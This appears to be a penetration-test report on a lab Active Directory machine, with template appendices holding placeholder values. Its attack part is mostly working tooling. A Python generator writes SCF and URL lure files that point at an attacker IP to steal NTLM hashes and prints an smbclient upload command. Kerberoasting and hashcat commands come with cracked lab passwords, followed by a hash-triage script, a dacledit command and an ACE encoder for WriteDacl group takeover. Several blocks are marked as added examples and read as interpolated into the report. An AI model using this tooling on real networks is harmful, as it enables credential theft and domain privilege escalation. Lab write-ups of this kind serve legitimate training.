Detailed Findings and Recommendations
The scope of this penetration test was to identify, exploit and report vulnerabilities on the following set of IP addresses.
| ID | IP | Name | DC |
|---|---|---|---|
| Machine 1 | 10.10.124.219 | BREACHDC.BREACH.VL | |
Enumeration
8. Internal Recon
NTLM theft by uploading lure files to a writable SMB share
Credentials obtained:
julia.wong
Computer1
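The lure files behind that step, as an added example rather than tooling from the report: each file carries an IconFile UNC path pointing at the attacker host, so when a user browses the share in Explorer the client authenticates to that host and Responder or ntlmrelayx captures the NetNTLMv2 response. The attacker address, the attacker share name, the lure file names and the target share name are assumptions; the upload goes over smbclient, anonymously when no user is given.

```python
"""Lure files for NTLM theft via a writable SMB share (added example).

The IconFile entries below point at an attacker SMB host; Explorer resolves
them when the directory is listed, which triggers NTLM authentication.
Attacker IP, share names and file names are assumptions, not values from
the report. A listener (Responder/ntlmrelayx) must be up before uploading.
"""
import os
import shlex


def scf_lure(attacker_ip: str, attacker_share: str = "lure") -> str:
    """Shell Command File; Explorer fetches IconFile as soon as the folder is shown."""
    return "\r\n".join([
        "[Shell]",
        "Command=2",
        f"IconFile=\\\\{attacker_ip}\\{attacker_share}\\icon.ico",
        "[Taskbar]",
        "Command=ToggleDesktop",
        "",
    ])


def url_lure(attacker_ip: str, attacker_share: str = "lure") -> str:
    """Internet shortcut; the icon is fetched over SMB without the link being clicked."""
    return "\r\n".join([
        "[InternetShortcut]",
        "URL=about:blank",
        f"IconFile=\\\\{attacker_ip}\\{attacker_share}\\icon.ico",
        "IconIndex=1",
        "",
    ])


def lure_files(attacker_ip: str, attacker_share: str = "lure", stem: str = "@readme") -> dict:
    """File name -> content. The '@' prefix sorts the lures to the top of a listing."""
    return {
        f"{stem}.scf": scf_lure(attacker_ip, attacker_share),
        f"{stem}.url": url_lure(attacker_ip, attacker_share),
    }


def write_lures(files: dict, outdir: str) -> list:
    """Write the lures to disk, keeping the CRLF line endings Windows expects."""
    os.makedirs(outdir, exist_ok=True)
    paths = []
    for name, content in files.items():
        path = os.path.join(outdir, name)
        with open(path, "w", newline="") as fh:
            fh.write(content)
        paths.append(path)
    return paths


def smbclient_upload_command(target: str, share: str, local_paths: list,
                             username: str = None, password: str = "") -> str:
    """smbclient one-liner that uploads every lure; null session (-N) if no user is given."""
    auth = ["-N"] if username is None else ["-U", f"{username}%{password}"]
    puts = "; ".join(f'put "{p}" "{os.path.basename(p)}"' for p in local_paths)
    cmd = ["smbclient", f"//{target}/{share}", *auth, "-c", puts]
    return " ".join(shlex.quote(c) for c in cmd)


if __name__ == "__main__":
    # Assumed attacker address and target share name; adjust to the engagement.
    paths = write_lures(lure_files("10.10.14.5"), "lures")
    print(smbclient_upload_command("10.10.124.219", "share", paths))
```

Once the lures are on the share, the capture side is whatever listener you point the UNC path at; the captured NetNTLMv2 response is then cracked offline (hashcat mode 5600) to get a plaintext such as the one recovered above.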
Kerberoasting with the recovered credentials. The argument to --kerberoasting is the file the TGS-REP hashes are written to, and that same file is fed to hashcat (mode 13100 = Kerberos 5 TGS-REP etype 23):
```bash
cme ldap ip.txt -u julia.wong -p Computer1 --kerberoasting hashes_kerberoasting
hashcat -m 13100 hashes_kerberoasting /usr/share/wordlists/rockyou.txt
```
Cracked service account:
svc_mssql
Trustno1
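Before handing the file to hashcat it is worth checking what encryption type each ticket actually uses, because the mode differs (13100 for RC4/etype 23, 19600 and 19700 for AES etypes 17 and 18) and RC4 tickets crack far faster. The triage below is an added example, not CrackMapExec or hashcat code; the sample lines are constructed with dummy hex in the $krb5tgs$ layout and will not crack against any wordlist.

```python
"""Triage Kerberoast output and pick the right hashcat mode per ticket (added example).

Parses $krb5tgs$ lines, reads the etype, validates the checksum length for that
etype and groups tickets by hashcat mode, RC4 first. Sample hashes are constructed.
"""
import re

HASHCAT_MODE = {23: 13100, 17: 19600, 18: 19700}
CHECKSUM_BYTES = {23: 16, 17: 12, 18: 12}   # HMAC-MD5 vs truncated HMAC-SHA1
HEX = re.compile(r"^[0-9a-fA-F]+$")

# Constructed sample output (layout only; ciphertext is filler).
# RC4 layout : $krb5tgs$23$*user$REALM$spn*$checksum$edata2
# AES layout : $krb5tgs$17|18$user$REALM$*spn*$checksum$edata2   (spn part optional)
SAMPLE_HASHES = [
    "$krb5tgs$23$*svc_mssql$BREACH.VL$MSSQLSvc/breachdc.breach.vl:1433*$" + "ab" * 16 + "$" + "cd" * 64,
    "$krb5tgs$18$svc_example$BREACH.VL$*HTTP/web.breach.vl*$" + "ef" * 12 + "$" + "01" * 64,
]


def parse_krb5tgs(line: str) -> dict:
    """Split one hash line into user, realm, SPN, etype and the hashcat mode for it."""
    fields = line.strip().split("$")
    if len(fields) < 7 or fields[0] != "" or fields[1] != "krb5tgs":
        raise ValueError(f"not a $krb5tgs$ line: {line[:40]!r}")
    etype = int(fields[2])
    if etype not in HASHCAT_MODE:
        raise ValueError(f"unsupported etype {etype}")
    checksum, edata = fields[-2], fields[-1]
    if not (HEX.match(checksum) and HEX.match(edata)):
        raise ValueError("checksum/edata are not hex")
    if len(checksum) != CHECKSUM_BYTES[etype] * 2:
        raise ValueError(f"etype {etype} expects a {CHECKSUM_BYTES[etype]}-byte checksum")
    user, realm, *rest = fields[3:-2]          # SPN is the optional third part
    spn = rest[0].strip("*") if rest else None
    return {
        "user": user.lstrip("*"),
        "realm": realm,
        "spn": spn,
        "etype": etype,
        "hashcat_mode": HASHCAT_MODE[etype],
        "line": line.strip(),
    }


def triage(lines) -> dict:
    """Group parsed tickets by hashcat mode; non-hash lines (tool status output) are skipped."""
    groups = {}
    for line in lines:
        if not line.strip().startswith("$krb5tgs$"):
            continue
        ticket = parse_krb5tgs(line)
        groups.setdefault(ticket["hashcat_mode"], []).append(ticket)
    return groups


def hashcat_commands(groups: dict, wordlist: str, prefix: str = "kerberoast") -> list:
    """One hashcat invocation per mode, lowest mode (13100, RC4) first."""
    return [f"hashcat -m {mode} {prefix}_{mode}.txt {wordlist}" for mode in sorted(groups)]


def write_hashfiles(groups: dict, prefix: str = "kerberoast") -> list:
    """Write one input file per mode, matching the names hashcat_commands() uses."""
    written = []
    for mode, tickets in groups.items():
        name = f"{prefix}_{mode}.txt"
        with open(name, "w") as fh:
            fh.write("\n".join(t["line"] for t in tickets) + "\n")
        written.append(name)
    return written


if __name__ == "__main__":
    groups = triage(SAMPLE_HASHES)
    for mode, tickets in sorted(groups.items()):
        print(mode, [(t["user"], t["spn"]) for t in tickets])
    for cmd in hashcat_commands(groups, "/usr/share/wordlists/rockyou.txt"):
        print(cmd)
```

If every ticket for an account comes back as etype 17 or 18, the account (or the domain policy) does not allow RC4; those still crack with modes 19600/19700, just at a much lower rate, so prioritise any etype 23 tickets first.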
Modifying the rights
To abuse WriteDacl over a group object, grant yourself the AddMember privilege (write access to the group's member attribute). Impacket's dacledit can be used for that purpose (cf. the "grant rights" reference for the link):
```bash
dacledit.py -action 'write' -rights 'WriteMembers' -principal 'controlledUser' -target-dn 'groupDistinguishedName' 'domain'/'controlledUser':'password'
```
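What that command appends to the group's DACL, as an added example that is not Impacket's code: an ACCESS_ALLOWED_OBJECT_ACE (MS-DTYP 2.4.4.3) carrying the WRITE_PROP access bit scoped to the schema GUID of the member attribute, with the controlled principal's SID as trustee. The block encodes the ACE and decodes it again so the bytes can be inspected before being written back. The principal SID is constructed; WriteDacl on the group is what makes the subsequent write of nTSecurityDescriptor succeed.

```python
"""Encode/decode the WriteMembers ACE that dacledit adds to a group DACL (added example).

Not Impacket code. ACE layout (MS-DTYP ACCESS_ALLOWED_OBJECT_ACE):
  header(type, flags, size) | Mask | Flags | ObjectType GUID | SID
The principal SID used in the demo is constructed.
"""
import struct
import uuid

# rightsGuid of the "member" attribute: WRITE_PROP scoped to it is "AddMember".
MEMBER_ATTRIBUTE_GUID = "bf9679c0-0de6-11d0-a285-00aa003049e2"

ACCESS_ALLOWED_OBJECT_ACE_TYPE = 0x05
ACE_OBJECT_TYPE_PRESENT = 0x00000001
ACE_INHERITED_OBJECT_TYPE_PRESENT = 0x00000002
ADS_RIGHT_DS_WRITE_PROP = 0x00000020


def sid_to_bytes(sid: str) -> bytes:
    """Textual SID (S-1-5-21-...) to the binary SID structure."""
    parts = sid.split("-")
    if len(parts) < 3 or parts[0] != "S":
        raise ValueError(f"malformed SID: {sid}")
    revision, authority = int(parts[1]), int(parts[2])
    subauths = [int(p) for p in parts[3:]]
    if len(subauths) > 15:
        raise ValueError("SID has more than 15 sub-authorities")
    return (struct.pack("<BB", revision, len(subauths))
            + authority.to_bytes(6, "big")              # IdentifierAuthority is big-endian
            + b"".join(struct.pack("<I", s) for s in subauths))


def bytes_to_sid(raw: bytes) -> str:
    revision, count = struct.unpack_from("<BB", raw, 0)
    authority = int.from_bytes(raw[2:8], "big")
    subauths = struct.unpack_from("<" + "I" * count, raw, 8)
    return "S-%d-%d%s" % (revision, authority, "".join("-%d" % s for s in subauths))


def build_write_members_ace(principal_sid: str) -> bytes:
    """ACE granting principal_sid WRITE_PROP on the group's member attribute."""
    body = (struct.pack("<II", ADS_RIGHT_DS_WRITE_PROP, ACE_OBJECT_TYPE_PRESENT)
            + uuid.UUID(MEMBER_ATTRIBUTE_GUID).bytes_le   # GUID in on-the-wire byte order
            + sid_to_bytes(principal_sid))
    header = struct.pack("<BBH", ACCESS_ALLOWED_OBJECT_ACE_TYPE, 0x00, 4 + len(body))
    return header + body


def parse_object_ace(raw: bytes) -> dict:
    """Decode an ACCESS_ALLOWED_OBJECT_ACE and say whether it is an AddMember grant."""
    ace_type, ace_flags, ace_size = struct.unpack_from("<BBH", raw, 0)
    if ace_type != ACCESS_ALLOWED_OBJECT_ACE_TYPE:
        raise ValueError(f"not an ACCESS_ALLOWED_OBJECT_ACE (type {ace_type:#x})")
    if ace_size != len(raw):
        raise ValueError("AceSize does not match buffer length")
    mask, flags = struct.unpack_from("<II", raw, 4)
    offset, object_type, inherited_type = 12, None, None
    if flags & ACE_OBJECT_TYPE_PRESENT:
        object_type = str(uuid.UUID(bytes_le=raw[offset:offset + 16]))
        offset += 16
    if flags & ACE_INHERITED_OBJECT_TYPE_PRESENT:
        inherited_type = str(uuid.UUID(bytes_le=raw[offset:offset + 16]))
        offset += 16
    return {
        "ace_flags": ace_flags,
        "mask": mask,
        "flags": flags,
        "object_type": object_type,
        "inherited_object_type": inherited_type,
        "sid": bytes_to_sid(raw[offset:ace_size]),
        "grants_add_member": bool(mask & ADS_RIGHT_DS_WRITE_PROP)
                             and object_type == MEMBER_ATTRIBUTE_GUID,
    }


if __name__ == "__main__":
    ace = build_write_members_ace("S-1-5-21-1004336348-1177238915-682003330-1105")  # constructed SID
    print(ace.hex())
    print(parse_object_ace(ace))
```

dacledit does the surrounding LDAP work: it reads the group's nTSecurityDescriptor, appends this ACE to the DACL and writes the descriptor back. Once the ACE is in place, adding the controlled user is an ordinary member write, for example with net rpc group addmem against the DC using the same credentials.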
Additional Items
Appendix - AMSI bypass code
Appendix - PowerShell shellcode runner
Appendix - ANOTHER_SHELLCODE_USED shellcode runner code
Appendix - Risk Assessment Matrix
Appendix - Proof and Local Contents
| Hostname | local.txt contents | proof.txt contents |
|---|---|---|
| HOSTNAME | foo | bar |
| HOSTNAME | foo | bar |
Appendix - Credentials obtained
NTLM Hashes
| Username | NTLM hash | Found on |
|---|---|---|
| Administrator | HASH | HOSTNAME |
Passwords
| Found on | Corresponds to | Password |
|---|---|---|
| HOSTNAME | USER IT BELONGS TO | Password123* |
Credential files
| Found on | File | Type |
|---|---|---|
| HOSTNAME | FILE (path where it was found) | Example: SSH private key |